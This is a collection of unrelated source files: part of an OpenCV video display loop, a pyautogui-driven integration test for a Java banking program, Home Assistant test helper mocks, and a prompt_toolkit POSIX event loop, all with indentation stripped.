#cv2.putText(frame,'Threshold: '+str(round(confThreshold,1)), (10, 10), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(0, 255, 255), 1, cv2.LINE_AA)
cv2.rectangle(frame, (220, 0),\
(300, 25), (0,0,0), -1)
cv2.putText(frame,'VID FPS: '+str(fps), (225, 10), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(0, 255, 255), 1, cv2.LINE_AA)
cv2.putText(frame,'NCS FPS: '+str(qfps), (225, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(0, 255, 255), 1, cv2.LINE_AA)
#cv2.rectangle(frame, (0, 265),(170, 300), (0,0,0), -1)
#cv2.putText(frame,'Positive detections: '+str(detections), (10, 280), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(0, 255, 255), 1, cv2.LINE_AA)
#cv2.putText(frame,'Elapsed time: '+str(round(t2secs,2)), (10, 290), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(0, 255, 255), 1, cv2.LINE_AA)
cv2.namedWindow('frame',cv2.WINDOW_NORMAL)
cv2.resizeWindow('frame',frameWidth,frameHeight)
cv2.imshow('frame',frame)
# FPS calculation
frames += 1
if frames >= 1:
end1 = time.time()
t1secs = end1-timer1
fps = round(frames/t1secs,2)
if queuepulls > 1:
end2 = time.time()
t2secs = end2-timer2
qfps = round(queuepulls/t2secs,2)
# clear the stream in preparation for the next frame
rawCapture.truncate(0)
keyPress = cv2.waitKey(1)
if keyPress == 113:
break
if keyPress == 82:
confThreshold += 0.1
if keyPress == 84:
confThreshold -= 0.1
if confThreshold >1:
confThreshold = 1
if confThreshold <0:
confThreshold = 0
cv2.destroyAllWindows()
|
Day4.py
|
import os
import time
import threading
import pyautogui
print("Integration Testing (Day 4) ...")
os.system("mvn compile")
os.chdir("./target/classes")
validAcc = " ../../ValidAccList.txt "
transSumDir = "../../TransactionFiles/"
master = " ../../Master.txt "
def runJava(session, arg1, arg2):
os.system("java main/Quinterac "+session+ arg1 + arg2)
t = threading.Thread(target=runJava, args=("frontend", validAcc, transSumDir+"TransSum1.txt",))
t.start()
time.sleep(1) # important for race conditions
pyautogui.write("login")
pyautogui.press("enter")
pyautogui.write("agent")
pyautogui.press("enter")
pyautogui.write("withdraw")
pyautogui.press("enter")
pyautogui.write("1234567")
pyautogui.press("enter")
pyautogui.write("1500")
pyautogui.press("enter")
pyautogui.write("logout")
pyautogui.press("enter")
t = threading.Thread(target=runJava, args=("frontend", validAcc, transSumDir+"TransSum2.txt",))
t.start()
time.sleep(1) # important for race conditions
pyautogui.write("login")
pyautogui.press("enter")
pyautogui.write("machine")
pyautogui.press("enter")
pyautogui.write("withdraw")
pyautogui.press("enter")
pyautogui.write("1234568")
pyautogui.press("enter")
pyautogui.write("13500")
pyautogui.press("enter")
pyautogui.write("logout")
pyautogui.press("enter")
t = threading.Thread(target=runJava, args=("frontend", validAcc, transSumDir+"TransSum3.txt",))
t.start()
time.sleep(1) # important for race conditions
pyautogui.write("login")
pyautogui.press("enter")
pyautogui.write("agent")
pyautogui.press("enter")
pyautogui.write("withdraw")
pyautogui.press("enter")
pyautogui.write("1234569")
pyautogui.press("enter")
pyautogui.write("79997000")
pyautogui.press("enter")
pyautogui.write("logout")
pyautogui.press("enter")
t = threading.Thread(target=runJava, args=("backend", master, "../../MergeTransSum.txt",))
t.start()
time.sleep(5) # important for race conditions
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
import functools as ft
import json
import logging
import os
import uuid
import sys
import threading
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
from io import StringIO
from unittest.mock import MagicMock, Mock, patch
import homeassistant.util.dt as date_util
import homeassistant.util.yaml.loader as yaml_loader
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
models as auth_models,
auth_store,
providers as auth_providers,
permissions as auth_permissions,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import mqtt, recorder
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED,
ATTR_SERVICE,
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_PLATFORM_DISCOVERED,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
SERVER_PORT,
STATE_ON,
STATE_OFF,
)
from homeassistant.core import State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.unit_system import METRIC_SYSTEM
from homeassistant.util.async_ import run_callback_threadsafe, run_coroutine_threadsafe
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)
).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_coroutine_threadsafe(func(*args, **kwargs), hass.loop).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), "testing_config", *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
run_coroutine_threadsafe(hass.async_start(), loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock):
return mock_coro()
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.config.location_name = "test home"
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone("US/Pacific")
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch("homeassistant.core._async_create_timer"), patch.object(
hass, "async_stop_track_tasks"
):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode("utf-8")
msg = mqtt.Message(topic, payload, qos, retain)
hass.data["mqtt"]._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(time)})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
@ha.callback
def async_fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.async_fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
with open(path, encoding="utf-8") as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
if old_state:
event_data["old_state"] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
async def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: "mock-broker"}
with patch("paho.mqtt.client.Client") as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().unsubscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
result = await async_setup_component(hass, mqtt.DOMAIN, {mqtt.DOMAIN: config})
assert result
await hass.async_block_till_done()
hass.data["mqtt"] = MagicMock(
spec_set=hass.data["mqtt"], wraps=hass.data["mqtt"]
)
return hass.data["mqtt"]
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Integration {} is already setup".format(component))
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {"name": name, "policy": policy}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(
self,
id=None,
is_owner=False,
is_active=True,
name="Mock User",
system_generated=False,
groups=None,
):
"""Initialize mock user."""
kwargs = {
"is_owner": is_owner,
"is_active": is_active,
"name": name,
"system_generated": system_generated,
"groups": groups or [],
"perm_lookup": None,
}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config
)
assert provider is not None, "Invalid config specified"
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError("Provider already registered")
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(
self,
domain=None,
dependencies=None,
setup=None,
requirements=None,
config_schema=None,
platform_schema=None,
platform_schema_base=None,
async_setup=None,
async_setup_entry=None,
async_unload_entry=None,
async_migrate_entry=None,
async_remove_entry=None,
partial_manifest=None,
):
"""Initialize the mock module."""
self.__name__ = "homeassistant.components.{}".format(domain)
self.__file__ = "homeassistant/components/{}".format(domain)
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {}),
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self,
hass,
logger=None,
domain="test_domain",
platform_name="test_platform",
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
async_entities_added_callback=lambda: None,
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger("homeassistant.helpers.entity_platform")
# Otherwise the constructor will blow up.
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
async_entities_added_callback=async_entities_added_callback,
)
class MockToggleEntity(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state, unique_id=None):
"""Initialize the mock entity."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the entity if any."""
self.calls.append(("name", {}))
return self._name
@property
def state(self):
"""Return the state of the entity if any."""
self.calls.append(("state", {}))
return self._state
@property
def is_on(self):
"""Return true if entity is on."""
self.calls.append(("is_on", {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the entity on."""
self.calls.append(("turn_on", kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the entity off."""
self.calls.append(("turn_off", kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls) if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(
self,
*,
domain="test",
data=None,
version=1,
entry_id=None,
source=config_entries.SOURCE_USER,
title="Mock Title",
state=None,
options={},
system_options={},
connection_class=config_entries.CONN_CLASS_UNKNOWN,
):
"""Initialize a mock config entry."""
kwargs = {
"entry_id": entry_id or uuid.uuid4().hex,
"domain": domain,
"data": data or {},
"system_options": system_options,
"options": options,
"version": version,
"title": title,
"connection_class": connection_class,
}
if source is not None:
kwargs["source"] = source
if state is not None:
kwargs["state"] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
    matchlist = sorted(list(files_dict.keys()), key=len, reverse=True) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, "name", fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, "name", fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if "homeassistant/components" in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding="utf-8")
# Not found
raise FileNotFoundError("File not found: {}".format(fname))
return patch.object(yaml_loader, "open", mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
return mock_coro_func(return_value, exception)()
def mock_coro_func(return_value=None, exception=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
if exception:
raise exception
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
    - count: The number of valid platforms that should be set up
    - domain: The domain to count. Optional; it can usually be
      determined automatically
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug(
"Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input),
)
return res
assert isinstance(config, dict)
with patch("homeassistant.config.async_process_component_config", mock_psc):
yield config
if domain is None:
assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
list(config.keys())
)
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, "setup_component failed, expected {} got {}: {}".format(
count, res_len, res
)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state in states:
restored_state = state.as_dict()
restored_state["attributes"] = json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
)
last_states[state.entity_id] = restore_state.StoredState(
State.from_dict(restored_state), now
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), "Duplicate entity_id? {}".format(
states
)
async def get_restore_state_data() -> restore_state.RestoreStateData:
return data
# Patch the singleton task in hass.data to return our new RestoreStateData
hass.data[key] = hass.async_create_task(get_restore_state_data())
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
"{}.{}".format(self.root, tom): resolve(base, tom.split("."))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict("sys.modules", to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if "entity_id" in values:
self.entity_id = values["entity_id"]
@property
def name(self):
"""Return the name of the entity."""
return self._handle("name")
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle("should_poll")
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle("unique_id")
@property
def available(self):
"""Return True if entity is available."""
return self._handle("available")
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle("device_info")
@property
def entity_registry_enabled_default(self):
"""Return if the entity should be enabled when first added to the entity registry."""
return self._handle("entity_registry_enabled_default")
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if "data" not in mock_data or "version" not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info("Loading data for %s: %s", store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
_LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
# To ensure that the data can be serialized
data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
with patch(
"homeassistant.helpers.storage.Store._async_load",
side_effect=mock_async_load,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store._write_data",
side_effect=mock_write_data,
autospec=True,
):
yield data
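# A short usage sketch (not part of the original helpers), assuming a hypothetical
# "my_component" integration that persists data via helpers.storage; the component
# name and the seeded payload below are illustrative only:
#
#     with mock_storage({"my_component": {"version": 1, "data": {"greeting": "hello"}}}) as stored_data:
#         await async_setup_component(hass, "my_component", {})
#         # anything the component writes through helpers.storage now lands in stored_data
#         assert "my_component" in stored_data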
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
store._async_cleanup_stop_listener()
store._async_cleanup_delay_listener()
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data["system_health"]["info"][domain](hass)
def mock_integration(hass, module):
"""Mock an integration."""
integration = loader.Integration(
hass,
"homeassistant.components.{}".format(module.DOMAIN),
None,
module.mock_manifest(),
)
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split(".")
integration_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if platform_name not in integration_cache:
mock_integration(hass, MockModule(platform_name))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache["{}.{}".format(platform_name, domain)] = module
def async_capture_events(hass, event_name):
"""Create a helper that captures events."""
events = []
@ha.callback
def capture_events(event):
events.append(event)
hass.bus.async_listen(event_name, capture_events)
return events
@ha.callback
def async_mock_signal(hass, signal):
"""Catch all dispatches to a signal."""
calls = []
@ha.callback
def mock_signal_handler(*args):
"""Mock service call."""
calls.append(args)
hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
return calls
|
posix.py
|
from __future__ import unicode_literals
import fcntl
import os
import random
import signal
import threading
import time
from prompt_toolkit.terminal.vt100_input import InputStream
from prompt_toolkit.utils import DummyContext, in_main_thread
from prompt_toolkit.input import Input
from .base import EventLoop, INPUT_TIMEOUT
from .callbacks import EventLoopCallbacks
from .inputhook import InputHookContext
from .posix_utils import PosixStdinReader
from .utils import TimeIt
from .select import AutoSelector, Selector, fd_to_int
__all__ = (
'PosixEventLoop',
)
_now = time.time
class PosixEventLoop(EventLoop):
"""
    Event loop for posix systems (Linux, Mac OS X).
"""
def __init__(self, inputhook=None, selector=AutoSelector):
assert inputhook is None or callable(inputhook)
assert issubclass(selector, Selector)
self.running = False
self.closed = False
self._running = False
self._callbacks = None
self._calls_from_executor = []
self._read_fds = {} # Maps fd to handler.
self.selector = selector()
# Create a pipe for inter thread communication.
self._schedule_pipe = os.pipe()
fcntl.fcntl(self._schedule_pipe[0], fcntl.F_SETFL, os.O_NONBLOCK)
# Create inputhook context.
self._inputhook_context = InputHookContext(inputhook) if inputhook else None
def run(self, stdin, callbacks):
"""
The input 'event loop'.
"""
assert isinstance(stdin, Input)
assert isinstance(callbacks, EventLoopCallbacks)
assert not self._running
if self.closed:
raise Exception('Event loop already closed.')
self._running = True
self._callbacks = callbacks
inputstream = InputStream(callbacks.feed_key)
current_timeout = [INPUT_TIMEOUT] # Nonlocal
# Create reader class.
stdin_reader = PosixStdinReader(stdin.fileno())
# Only attach SIGWINCH signal handler in main thread.
# (It's not possible to attach signal handlers in other threads. In
# that case we should rely on a the main thread to call this manually
# instead.)
if in_main_thread():
ctx = call_on_sigwinch(self.received_winch)
else:
ctx = DummyContext()
def read_from_stdin():
" Read user input. "
# Feed input text.
data = stdin_reader.read()
inputstream.feed(data)
# Set timeout again.
current_timeout[0] = INPUT_TIMEOUT
# Quit when the input stream was closed.
if stdin_reader.closed:
self.stop()
self.add_reader(stdin, read_from_stdin)
self.add_reader(self._schedule_pipe[0], None)
with ctx:
while self._running:
# Call inputhook.
if self._inputhook_context:
with TimeIt() as inputhook_timer:
def ready(wait):
" True when there is input ready. The inputhook should return control. "
return self._ready_for_reading(current_timeout[0] if wait else 0) != []
self._inputhook_context.call_inputhook(ready)
inputhook_duration = inputhook_timer.duration
else:
inputhook_duration = 0
# Calculate remaining timeout. (The inputhook consumed some of the time.)
if current_timeout[0] is None:
remaining_timeout = None
else:
remaining_timeout = max(0, current_timeout[0] - inputhook_duration)
# Wait until input is ready.
fds = self._ready_for_reading(remaining_timeout)
# When any of the FDs are ready. Call the appropriate callback.
if fds:
# Create lists of high/low priority tasks. The main reason
# for this is to allow painting the UI to happen as soon as
# possible, but when there are many events happening, we
# don't want to call the UI renderer 1000x per second. If
# the eventloop is completely saturated with many CPU
# intensive tasks (like processing input/output), we say
# that drawing the UI can be postponed a little, to make
# CPU available. This will be a low priority task in that
# case.
tasks = []
low_priority_tasks = []
now = None # Lazy load time. (Fewer system calls.)
for fd in fds:
# For the 'call_from_executor' fd, put each pending
# item on either the high or low priority queue.
if fd == self._schedule_pipe[0]:
for c, max_postpone_until in self._calls_from_executor:
if max_postpone_until is None:
# Execute now.
tasks.append(c)
else:
# Execute soon, if `max_postpone_until` is in the future.
now = now or _now()
if max_postpone_until < now:
tasks.append(c)
else:
low_priority_tasks.append((c, max_postpone_until))
self._calls_from_executor = []
# Flush all the pipe content.
os.read(self._schedule_pipe[0], 1024)
else:
handler = self._read_fds.get(fd)
if handler:
tasks.append(handler)
# Handle everything in random order. (To avoid starvation.)
random.shuffle(tasks)
random.shuffle(low_priority_tasks)
# When there are high priority tasks, run all these.
# Schedule low priority tasks for the next iteration.
if tasks:
for t in tasks:
t()
# Postpone low priority tasks.
for t, max_postpone_until in low_priority_tasks:
self.call_from_executor(t, _max_postpone_until=max_postpone_until)
else:
# Currently there are only low priority tasks -> run them right now.
for t, _ in low_priority_tasks:
t()
else:
# Flush all pending keys on a timeout. (This is most
# important to flush the vt100 'Escape' key early when
# nothing else follows.)
inputstream.flush()
# Fire input timeout event.
callbacks.input_timeout()
current_timeout[0] = None
self.remove_reader(stdin)
